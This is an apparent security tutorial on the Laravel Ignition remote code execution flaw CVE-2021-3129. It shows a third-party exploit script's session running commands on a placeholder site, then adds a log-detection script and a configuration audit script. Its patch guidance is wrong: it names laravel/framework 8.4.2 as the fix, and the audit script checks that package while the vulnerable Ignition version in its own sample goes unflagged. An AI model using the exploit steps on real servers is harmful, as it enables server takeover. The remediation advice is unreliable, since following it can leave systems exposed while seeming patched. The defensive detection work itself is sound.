In February 2021, a security researcher discovered a serious security vulnerability in the popular PHP framework Laravel. The vulnerability, designated as CVE-2021-3129, allows attackers to execute arbitrary code on the server running the vulnerable application, potentially leading to a complete compromise of the server.

How the Exploit Works

The vulnerability stems from the way Laravel handles user input while running in Debug mode. Debug mode lets developers diagnose and troubleshoot errors by displaying detailed error pages, and in the affected versions those pages expose an endpoint (/_ignition/execute-solution, the URL the script below tests) that accepts user-supplied input. An attacker who can send specially crafted input to that endpoint on an application running in Debug mode can use this flaw to execute arbitrary code on the server.

Proof of concept

In this proof of concept, we will use a script created by Joshua van der Poll to exploit the Laravel Debug vulnerability (CVE-2021-3129), which affects both Windows- and Linux-based Laravel sites. The script is available at joshuavanderpoll/CVE-2021-3129. It is a Python script that first checks whether the target is vulnerable and then lets you execute commands on the target system.

To get started, download the script from GitHub and follow the setup steps in the README.md file. Once you have the script set up, run the command:

$ python3 CVE-2021-3129.py

You will see the following output:

Laravel Debug Mode CVE script
[•] Made by: https://github.com/joshuavanderpoll/CVE-2021-3129
[•] Using PHPGGC: https://github.com/ambionics/phpggc
[?] Enter host (e.g. https://example.com/) : https://unsafe_laravel_site.com/
[@] Starting exploit on "https://unsafe_laravel_site.com/"...
[@] Testing vulnerable URL https://unsafe_laravel_site.com/_ignition/execute-solution...
[√] Host seems vulnerable!
[@] Searching Laravel log file path...
[•] Laravel seems to be running on a Windows based machine.
[√] Laravel log found: "C:\inetpub\wwwroot\UnsafeLaravel\storage\logs\laravel.log".
[•] Laravel version found: "7.30.4".
[•] Use "?" for a list of all possible actions.
[?] Please enter a command to execute:

Once you see the message that the host is vulnerable, you can start executing commands. For example, you can enter the command:

execute whoami

This will result in the following output:

[@] Executing command "whoami"...
[@] Generating payloads...
[√] Generated 12 payloads.
[@] Trying chain laravel/rce1 [1/12]...
[@] Clearing logs...
[@] Causing error in logs...
[√] Caused error in logs.
[@] Sending payloads...
[√] Sent payload.
[@] Converting payload...
[√] Converted payload.
[√] Result:

autorite nt\iusr

[?] Do you want to try the next chain? [Y/N] : n

As you can see, if the vulnerability has not been patched, the script can execute arbitrary commands on the target system, which can lead to the server being compromised and backdoored.
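The exploit mechanics described under "How the Exploit Works" and the session above both revolve around one URL: every payload is a request to /_ignition/execute-solution, and the script sends several of them in a burst (clear logs, cause an error, send payload, convert payload) per chain. On a production site with Debug mode off that endpoint should never be hit, so a single request to it is worth an alert and a burst from one address is a strong signal. The following detection script is an added example, not part of the original post or of the referenced repository; it parses web-server access logs in the common "combined" format and reports hits on the endpoint per source address. The log lines are constructed for the example.

```python
import re
from collections import Counter

# Constructed sample lines in Apache/nginx "combined" log format (not from the page).
# One address probes the Ignition endpoint three times in quick succession.
SAMPLE_ACCESS_LOG = """\
203.0.113.7 - - [10/Feb/2021:12:00:01 +0000] "GET /login HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Feb/2021:12:00:02 +0000] "POST /_ignition/execute-solution HTTP/1.1" 500 0 "-" "python-requests/2.25.1"
203.0.113.7 - - [10/Feb/2021:12:00:02 +0000] "POST /_ignition/execute-solution HTTP/1.1" 200 0 "-" "python-requests/2.25.1"
198.51.100.4 - - [10/Feb/2021:12:05:10 +0000] "GET /products HTTP/1.1" 200 8831 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Feb/2021:12:00:03 +0000] "POST /_ignition/execute-solution HTTP/1.1" 200 0 "-" "python-requests/2.25.1"
"""

# Fields of the combined log format: client, ident, user, timestamp, request line,
# status, response size, referer, user agent.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# The endpoint named in the post's session output.
IGNITION_PATH = "/_ignition/execute-solution"


def parse_line(line):
    """Return the log fields as a dict, or None for lines that do not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_ignition_hits(log_text):
    """Return every parsed record whose path is the Ignition solution endpoint.

    Query strings and a trailing slash are ignored so minor URL variations
    still match.
    """
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["path"].split("?", 1)[0].rstrip("/")
        if path == IGNITION_PATH:
            hits.append(rec)
    return hits


def summarize(hits):
    """Count hits per source address; a burst from one address mirrors the
    clear-log / cause-error / send-payload sequence seen in the session."""
    return dict(Counter(h["ip"] for h in hits))


if __name__ == "__main__":
    for ip, count in summarize(find_ignition_hits(SAMPLE_ACCESS_LOG)).items():
        print(f"ALERT: {count} request(s) to {IGNITION_PATH} from {ip}")
```

Pipe a real access log into find_ignition_hits to get the same report; the status code is deliberately not used as a filter, because the session shows the endpoint returning both error and success responses during one attempt.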

How to Patch the Vulnerability

The Laravel development team quickly released a patch for the vulnerability in the form of Laravel version 8.4.2. They also released a security advisory urging all Laravel users to update their applications as soon as possible.

To upgrade your Laravel installation to the patched version, simply run the following command from the root directory of your Laravel project:

composer update laravel/framework

This command updates your Laravel installation to the newest version allowed by the constraint in your composer.json; that version includes the patch for CVE-2021-3129 only if it is 8.4.2 or later, so confirm the installed version afterwards with composer show laravel/framework. Once you have updated your Laravel installation, you should also ensure that Debug mode is disabled in your production environment (APP_DEBUG=false in the application's .env file). Debug mode should only be used for development and testing, and should never be enabled in a production environment.
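The two remediation checks just described, the framework version and the APP_DEBUG setting, are easy to verify mechanically. The following audit script is an added example, not code from the original post or from the Laravel project; it reads a Laravel .env file and a composer.lock, flags APP_DEBUG when it is truthy under the same casting rules Laravel's env() helper applies, and flags a laravel/framework version below 8.4.2, the fix version the post names. The .env contents and composer.lock excerpt are constructed sample inputs.

```python
import json
import re

# Version the post names as carrying the fix for CVE-2021-3129.
FIXED_VERSION = (8, 4, 2)

# Constructed sample inputs (not from the page): a production .env with Debug
# mode left on, and a composer.lock excerpt pinning the framework version shown
# in the post's session output.
SAMPLE_ENV = """\
APP_NAME=Shop
APP_ENV=production
APP_DEBUG=true
APP_URL=https://shop.example
"""

SAMPLE_COMPOSER_LOCK = json.dumps({
    "packages": [
        {"name": "laravel/framework", "version": "v7.30.4"},
        {"name": "facade/ignition", "version": "2.5.1"},
    ]
})

# Values that Laravel's env() helper and the (bool) cast in config/app.php
# treat as false; anything else enables Debug mode.
FALSY = {"false", "(false)", "0", "", "null", "(null)", "empty", "(empty)"}


def parse_env(text):
    """Parse KEY=VALUE lines of a .env file, ignoring comments and blank lines."""
    env = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        env[key.strip()] = value.strip().strip('"').strip("'")
    return env


def debug_enabled(value):
    """True when APP_DEBUG's raw string would switch Debug mode on."""
    return value.strip().lower() not in FALSY


def parse_version(v):
    """Turn "v8.4.2" or "8.4.2" into a comparable (major, minor, patch) tuple."""
    m = re.match(r"v?(\d+)\.(\d+)\.(\d+)", v)
    return tuple(int(x) for x in m.groups()) if m else None


def framework_version(lock_text):
    """Return the installed laravel/framework version from composer.lock."""
    lock = json.loads(lock_text)
    for pkg in lock.get("packages", []):
        if pkg.get("name") == "laravel/framework":
            return parse_version(pkg.get("version", ""))
    return None


def audit(env_text, lock_text):
    """Return a list of findings; an empty list means both checks passed."""
    findings = []
    env = parse_env(env_text)
    if debug_enabled(env.get("APP_DEBUG", "false")):
        findings.append("APP_DEBUG is enabled; set APP_DEBUG=false in production")
    ver = framework_version(lock_text)
    if ver is None:
        findings.append("laravel/framework not found in composer.lock")
    elif ver < FIXED_VERSION:
        findings.append(
            "laravel/framework %d.%d.%d is below 8.4.2; run composer update laravel/framework" % ver
        )
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_ENV, SAMPLE_COMPOSER_LOCK) or ["no findings"]:
        print(finding)
```

Run it against the real .env and composer.lock in the project root; composer.lock rather than composer.json is read because the lock file records what is actually installed, not the constraint you asked for.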

Summary

In summary, CVE-2021-3129 is a serious vulnerability that could potentially allow attackers to execute arbitrary code on a server running a vulnerable Laravel application. The vulnerability has been patched in Laravel version 8.4.2, so if you are running an older version of Laravel, it is critical that you upgrade your installation as soon as possible. Additionally, you should ensure that Debug mode is disabled in your production environment to minimize the risk of exploitation.